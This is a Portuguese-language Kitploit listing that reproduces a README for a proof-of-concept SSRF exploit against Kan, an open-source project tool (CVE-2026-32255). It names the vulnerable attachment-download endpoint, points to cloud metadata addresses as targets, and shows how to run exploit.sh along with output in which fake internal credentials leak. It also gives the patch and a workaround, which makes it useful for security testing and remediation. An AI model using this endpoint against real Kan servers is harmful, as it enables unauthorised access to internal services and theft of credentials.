Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
poc-cve-2026-32255 — Este repositório contém uma prova de conceito (POC) para CVE-2026-32255, uma vulnerabilidade de alta gravidade de Server-Side Request Forgery (SSRF) no Kan, uma ferramenta de gerenciamento de projetos de código aberto. | Kitploit
Ferramentas/GitHubGitHub/koadt/poc-cve-2026-32255
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubkoadt/poc-cve-2026-32255

poc-cve-2026-32255

Este repositório contém uma prova de conceito (POC) para CVE-2026-32255, uma vulnerabilidade de alta gravidade de Server-Side Request Forgery (SSRF) no Kan, uma ferramenta de gerenciamento de projetos de código aberto.

Ver Repositório
2há 5 mesesAinda não revisado
Site

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SSRF no Kan via Download de Anexo (CVE-2026-32255) - Prova de Conceito

Este repositório contém uma prova de conceito (POC) para a CVE-2026-32255, uma vulnerabilidade de Server-Side Request Forgery (SSRF) de alta gravidade no Kan, uma ferramenta de gerenciamento de projetos de código aberto.

O endpoint vulnerável permite que atacantes não autenticados façam requisições HTTP arbitrárias a partir do servidor e leiam a resposta completa, possibilitando acesso a serviços internos e endpoints de metadados de nuvem.

Sumário

  1. Detalhes da Vulnerabilidade
  2. Executando a POC
  3. Usando o Script de Exploit
  4. Como Corrigir a Vulnerabilidade
  5. Aviso Legal

Detalhes da Vulnerabilidade

Informações da CVE

  • ID da CVE: CVE-2026-32255
  • Versões Afetadas: Kan <= 0.5.4
  • Versão Corrigida: 0.5.5
  • Pontuação CVSS: 8.6 (Alta)
  • Vetor CVSS: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
  • CWE: CWE-918 (Server-Side Request Forgery)
  • Descrição

    O arquivo apps/web/src/pages/api/download/attatchment.ts expõe um endpoint GET /api/download/attatchment destinado a fazer proxy de downloads de anexos do armazenamento S3. O endpoint aceita um parâmetro de consulta url controlado pelo usuário e o passa diretamente para fetch() no lado do servidor, sem qualquer validação ou autenticação:

    root@kitploit:~
    const upstream = await fetch(url); // sem validação em `url`
    

    Um atacante pode fornecer qualquer URL, fazendo com que o servidor faça uma requisição HTTP para esse destino e retorne o corpo completo da resposta ao cliente. Isso é um SSRF de leitura completa (não cego), o que significa que o atacante pode ler todo o conteúdo da resposta.

    Impacto

    • Acesso a serviços internos não expostos à internet
    • Leitura de endpoints de metadados de nuvem (por exemplo, http://169.254.169.254/ na AWS/GCP)
    • Varredura de portas em redes internas
    • Exfiltração de dados sensíveis de APIs internas

    Referências

    • NVD - CVE-2026-32255
    • Aviso de Segurança do GitHub - GHSA-qrx8-9hc6-jvqg
    • Commit de Correção

    Executando a POC

    Pré-requisitos

    • Docker e Docker Compose
    • Bash
    • curl

    Passo 1: Executar uma Instância Vulnerável do Kan

    Clone e execute o Kan v0.5.4 (a última versão vulnerável):

    root@kitploit:~
    git clone --branch v0.5.4 https://github.com/kanbn/kan.git
    cd kan
    

    Configure as variáveis de ambiente necessárias:

    root@kitploit:~
    cat > .env <<'EOF'
    NEXT_PUBLIC_BASE_URL=http://localhost:3000
    BETTER_AUTH_SECRET=poc-secret-not-for-production-use
    POSTGRES_URL=postgresql://kan:kan@localhost:5432/kan_db
    POSTGRES_PASSWORD=kan
    REDIS_URL=redis://localhost:6379
    NEXT_PUBLIC_STORAGE_URL=http://localhost:9000
    EOF
    

    Nota: Se você receber um erro sobre dokploy-network, remova as referências a dokploy-network do docker-compose.yml (linhas 9, 130-131) e execute docker compose up -d novamente. Essa rede não é necessária localmente.

    Inicie os contêineres:

    root@kitploit:~
    docker compose up -d
    

    A aplicação deve estar disponível em http://localhost:3000.

    Passo 2: Iniciar o Serviço Interno Simulado

    Em um terminal separado, inicie o serviço interno simulado incluído, que simula uma API interna sensível:

    root@kitploit:~
    python3 internal-service.py
    

    Isso inicia um servidor na porta 8888 que retorna credenciais falsas, simulando um serviço que deveria ser acessível apenas pela rede interna. Em um cenário do mundo real, esse serviço estaria isolado atrás de um firewall e inacessível externamente. O SSRF permite que o atacante o alcance através do servidor.

    Passo 3: Executar o Exploit

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh http://localhost:3000
    

    Usando o Script de Exploit

    Uso

    root@kitploit:~
    ./exploit.sh <url-alvo> [url-interna]
    
    • <url-alvo>: URL base da instância do Kan (por exemplo, http://localhost:3000)
    • [url-interna]: URL interna para buscar via SSRF (opcional, detectada automaticamente a partir do gateway da ponte Docker)

    Exemplo

    root@kitploit:~
    ./exploit.sh http://localhost:3000
    
    root@kitploit:~
    === CVE-2026-32255 - SSRF no Kan via Download de Anexo ===
    Alvo: http://localhost:3000
    URL Interna: http://172.17.0.1:8888
    
    [*] Verificando se o endpoint está acessível...
    [+] Endpoint acessível (HTTP 400)
    
    [*] Tentando SSRF para http://172.17.0.1:8888 ...
    [+] VULNERÁVEL - O servidor buscou o recurso interno
    
    Conteúdo vazado:
    ------------------------------------------------------------
    {
      "service": "internal-config-api",
      "credentials": {
        "db_host": "10.0.0.5",
        "db_user": "admin",
        "db_password": "s3cret_passw0rd!",
        "api_key": "sk-internal-4f8a2b1c9d3e7f6a5b0c8d2e1f4a7b3c"
      }
    }
    ------------------------------------------------------------
    

    Como Corrigir a Vulnerabilidade

    Atualizar o Kan (Recomendado)

    Atualize para o Kan v0.5.5 ou posterior, que valida o parâmetro url em relação ao nome do host do endpoint S3 configurado antes de fazer o proxy da requisição.

    Solução Alternativa: Bloquear no Proxy Reverso

    Se você não puder atualizar imediatamente, bloqueie o acesso externo ao endpoint vulnerável no nível do seu proxy reverso.


    Aviso Legal

    Esta prova de conceito é fornecida apenas para fins educacionais e testes de segurança autorizados. Use esta ferramenta somente em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar.

    O autor não é responsável por qualquer uso indevido das informações ou ferramentas fornecidas neste repositório. O acesso não autorizado a sistemas de computador é ilegal.


    Descoberto por: kOaDT ([email protected])

    Baixar ferramenta